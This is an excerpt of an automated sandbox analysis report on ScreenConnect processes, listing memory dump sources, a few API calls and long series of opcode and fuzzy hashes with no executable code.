                                                                                                                                                                                                                                                    control_flow_graph 322 7ff848f03eaa-7ff848f084ef 324 7ff848f084f6-7ff848f08550 SetProcessMitigationPolicy 322->324 325 7ff848f08558-7ff848f08587 324->325 326 7ff848f08552 324->326 326->325
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2454397073.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ff848f00000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1088084561-0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 426 7ff848f03dfa-7ff848f1f4e9 CloseHandle 429 7ff848f1f4eb 426->429 430 7ff848f1f4f1-7ff848f1f51f 426->430 429->430
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2454397073.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ff848f00000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: nCuq$
                                                                                                                                                                                                                                                    • API String ID: 0-3867085953
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: $]q$$]q
                                                                                                                                                                                                                                                    • API String ID: 0-127220927
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: c653a397c7d49b12d97f7e3afc48a5ece38e9d02a3bb1a0094009eef4ad64106
                                                                                                                                                                                                                                                    • Instruction ID: 852964e79945d762eb4300bcb21971c8e66aa7cdb8c36b7c8829041177568fcd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c653a397c7d49b12d97f7e3afc48a5ece38e9d02a3bb1a0094009eef4ad64106
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24416CB4A00705CFDB74DF69D944A6ABBF1FF94310B144A28D456C77A0D730EA49CBA0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2c74147af4de43dc4988da2b3562ed95cd9c7be37ab47f41908130c90e491ff0
                                                                                                                                                                                                                                                    • Instruction ID: 4b28fdcb65e3398820eaa5427c67345513e580486218667a8ee9c84d50dbb698
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c74147af4de43dc4988da2b3562ed95cd9c7be37ab47f41908130c90e491ff0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3416CB4600705CFCB74DF69D944A5ABBF5FF84310B148A28D456CB7A5EB30E945CBA0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9049be3e5ccbc4090fe68f33ef0775025328768eb7f4281437e94c52275edd17
                                                                                                                                                                                                                                                    • Instruction ID: 7f9fe8cc3c262fd859df52ae42c208ede9758f0f1f4c7ae6eff08b53d055fc0b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9049be3e5ccbc4090fe68f33ef0775025328768eb7f4281437e94c52275edd17
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18316B31B102068FDB149F69C594AAFFBF6EF89314F14846AE406E7395DB32DD058BA0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 954499e496fe03c50d8c192493a9136386f7621f1d8ac33a1a611fad9c2bd119
                                                                                                                                                                                                                                                    • Instruction ID: 7fa43dd3f3e3ebe9059797ca377239083986904f9c48ef9e89d66a82fbee963c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 954499e496fe03c50d8c192493a9136386f7621f1d8ac33a1a611fad9c2bd119
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E231B470F442458FC705DB68C8645AEFFB6EFCA310B1580AAD549DB395DB319E01CBA1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 533df216d1eb3e934fb9b3cc48b282a1e561e20d9a8b93e1ff2325e50ba25d22
                                                                                                                                                                                                                                                    • Instruction ID: 6d640afc147c6b6a6b5edef9edc532a69de21ea977b294500d042fc27b14f6d9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 533df216d1eb3e934fb9b3cc48b282a1e561e20d9a8b93e1ff2325e50ba25d22
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38315030600B058FC730DF69D984A56B7F2FF99321B144A2CD496CB7A5D730E845CBA1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 74f0d27ebe31d8b6b9594716097896fe05466c9690cae4a93c7d41f3015de9a7
                                                                                                                                                                                                                                                    • Instruction ID: 18ca9202a83a689838f0a777b8685a3ca26689e174ee864473dcc0cb7a903d14
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74f0d27ebe31d8b6b9594716097896fe05466c9690cae4a93c7d41f3015de9a7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E316136A0010ADFCF05DFA8E9405CDBBB2FF89315F158426D505BB264DB32A90BCBA0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a7db2ba7c552a5a1f661ae3889ca8ada33a3537c77455c605fb6e2beab38e2c4
                                                                                                                                                                                                                                                    • Instruction ID: a0a203f9bcddaa0ff658a1367f9d23be965365740de31a572035e5e8cffcf375
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7db2ba7c552a5a1f661ae3889ca8ada33a3537c77455c605fb6e2beab38e2c4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9521AF39B002045FC714DB7CE8809AEBBA6EFC5260714852AE955CB3A9DB71AD06CB91
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1ce9fec6c7bfd1019c21808c57ecd74ed137a7bc09a872745ddc04f5e1d8a5e7
                                                                                                                                                                                                                                                    • Instruction ID: 3076bfb3024dcbac755e095b8b202407a04f5e6fc51adb795192bb82a0a2ef89
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ce9fec6c7bfd1019c21808c57ecd74ed137a7bc09a872745ddc04f5e1d8a5e7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A112134F441418FC7049B68D8905AEFFB1EFC9310B2841BAE9499B391DB319D01CBA1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2444777275.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_99d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d7a417385150f6ec0fc015d60b25d75c2749a912c08bb7f7880f5e4bb27c9a13
                                                                                                                                                                                                                                                    • Instruction ID: a468870969eb2eb8154d3c8e10bc6cc1c8323e24158e09d5ac990ace38776c17
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7a417385150f6ec0fc015d60b25d75c2749a912c08bb7f7880f5e4bb27c9a13
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C901DB714063449AEB208E1DCDC4B67FF9CEF45324F18C529ED490B286C27D9941C6B1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2444777275.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_99d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 630485591e8a8e7b2c6f9a9dd704ff5f935ff6c5a189679ba57fa7500b4ebc15
                                                                                                                                                                                                                                                    • Instruction ID: d779bb4698e05e43260a05b3bafa91f2ee7690cbf61b6446967a44b53504cb24
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 630485591e8a8e7b2c6f9a9dd704ff5f935ff6c5a189679ba57fa7500b4ebc15
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7001006140E3C09EE7128B258C94652BFB8EF57224F1985DBD9888F1A7C2695849C772
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8da8161b11a78ecef1c7a4f8087c4b61ac29a487a04401b40ee49fd2e52158a6
                                                                                                                                                                                                                                                    • Instruction ID: fb67e427017ed64d1d2a77ba308bea2b05780c58440e21466216020870bd8a7e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8da8161b11a78ecef1c7a4f8087c4b61ac29a487a04401b40ee49fd2e52158a6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D601AD7660D3808FC365CF38A840686BBE1AF65700F0988AFE4C5C72C1EA32AC45CB25
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e8d401ad198a11896b8657e0805c3f2b645b257ae48ee5fe863a86fe4cce80e4
                                                                                                                                                                                                                                                    • Instruction ID: f2c2a680529a56914117a7f2cff7e3e8b980a507a09fbed7cf5bba276c9abf5c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8d401ad198a11896b8657e0805c3f2b645b257ae48ee5fe863a86fe4cce80e4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42F0C8B691C3059FC715CF78D54014ABBE59F85214F09C57FD48DD3250EA39A902DB62
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 495af340ff7861eb42ddd751a6a5584da354ebe3ee5ade25d9a2e97cdf638e21
                                                                                                                                                                                                                                                    • Instruction ID: 3441de68f70c18e5de46d1ff146674c11e790f0fa7ff6124ade75b2786213628
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 495af340ff7861eb42ddd751a6a5584da354ebe3ee5ade25d9a2e97cdf638e21
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20F0283A2406004FCB129B3CA8259AA3FA6DFC934030881AED045CB216DF71DC099BE1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3687d449702c33d1c373adebbd95d77f10c9e8408dfece5b0781c5008592df74
                                                                                                                                                                                                                                                    • Instruction ID: e71dc0ed720f1c0d041f8333d61c6de90f42322d862aaf3171d6f31605a241f8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3687d449702c33d1c373adebbd95d77f10c9e8408dfece5b0781c5008592df74
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4F08C77B0C3146FDB28CABAA40069BBBDECBD5224B14C07FE55DC3780E975A8018764
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: fb6f06f35858cb7f2ecf4abac198da080fdf7099b9bb6d0fbed4f87461358606
                                                                                                                                                                                                                                                    • Instruction ID: 8dbd053605ecc61b8cf8d93a6a50adc6965fb2d6afbe3e60e76a1284c64c7c68
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb6f06f35858cb7f2ecf4abac198da080fdf7099b9bb6d0fbed4f87461358606
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38F0A722706E825FC71152547C540056FD58E56356B2C81E2F054CB28AE911CCC14371
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: fd3a56bcd18bdc0a2f494bd4649210e9e0a8e0a9e2a435d6ddf1d55cd0dee4bc
                                                                                                                                                                                                                                                    • Instruction ID: 92f990faca1a19a1df3196faa5dddd262c7ccddd47b0be46ae678c1a4be2f978
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd3a56bcd18bdc0a2f494bd4649210e9e0a8e0a9e2a435d6ddf1d55cd0dee4bc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8F0B4A350C3904FD326A778B8116983FA1DEE231074849DAD4818F6A7D75AEA09D761
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: fa0f9aeb6c1bafa3fe07db3874fd149d83d53001142f2e591ebacf89cc8003bd
                                                                                                                                                                                                                                                    • Instruction ID: 04afa3fb7c612c5b9195cc413b44de516be6ae0e6d06cbb8b64779a631c99a0e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa0f9aeb6c1bafa3fe07db3874fd149d83d53001142f2e591ebacf89cc8003bd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F0E536300A008B8B16A66DE82095F3BDADFC9750314803DE409C7304EFB2EC05ABD1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 080a792fb305a12ecb03006e6e6df8600f3f550cff89ae3a9ba1c7997c053c05
                                                                                                                                                                                                                                                    • Instruction ID: ce99df7dcc33ca72752d381a90e81bf0e4c7b2b7ca9fd24c70d8fb1c2ccd6ec1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 080a792fb305a12ecb03006e6e6df8600f3f550cff89ae3a9ba1c7997c053c05
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15E0E53E7042408BC3465BB8982412D3B739EC222130C8827D156CB3F1CE318C05CBB2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2192460293efb5eff2ff9e08411480f53d5049782dab9e1fc026addcbdd9a0eb
                                                                                                                                                                                                                                                    • Instruction ID: 6a8c217894b3ad21dfeed926bb7fb29d5deadd2882232e5286c261e02b9ed56c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2192460293efb5eff2ff9e08411480f53d5049782dab9e1fc026addcbdd9a0eb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96E02631700310578B142AAE78C852FBADAFFC9A21344843DF20EC3340CE718C0543E0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 683b2755ac9b874e9aca0673ba35ca85c3cb21b5784c3bdf382ccee417c74a67
                                                                                                                                                                                                                                                    • Instruction ID: 149e6c828f75cf0375c31626fa97ed1826a20d92510caa408eee455e6e6d774f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 683b2755ac9b874e9aca0673ba35ca85c3cb21b5784c3bdf382ccee417c74a67
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69F0E538A192909FC7066FB59A1C2587FE1EF46302B19449AD41687321CB319801CBE2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 40c1acf650d09d82135d828d589adb3055fd177b1747d44bc57a43675c123b2e
                                                                                                                                                                                                                                                    • Instruction ID: afb98b9ebe330825430bf07f4c0074995a4109ccc57cb6210cfc7faa6af8a18b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40c1acf650d09d82135d828d589adb3055fd177b1747d44bc57a43675c123b2e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1CE0227894B2CA9FC742EFB4EC40759BFB8CB43202B0441DAD548CB252DA714F049BA2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: ff5ec04d9b012bdb72f427f262eec01276f0ca8d8caca39d397b80714e142968
                                                                                                                                                                                                                                                    • Instruction ID: 4d32f96d50a774721f0ab33e2cfc9223125b442d102a84c73c54c900c2440fec
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff5ec04d9b012bdb72f427f262eec01276f0ca8d8caca39d397b80714e142968
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7E0DF36740300878B042BFD64D822D76D3AFC8626358883EE10AD33A0CE728C164791
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3e9368b782a0545b165f2dbb5df833ad97751a948aedad1750aa93cbcb9fc002
                                                                                                                                                                                                                                                    • Instruction ID: 835cca07cf911d9272f3c2a7ea86640e66289ea010ab22a570221af0e4e9735e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e9368b782a0545b165f2dbb5df833ad97751a948aedad1750aa93cbcb9fc002
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21E08632B01D519B8B10915CB854555B3C98F99365F3C8571F528CB388FA22DC8143B0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
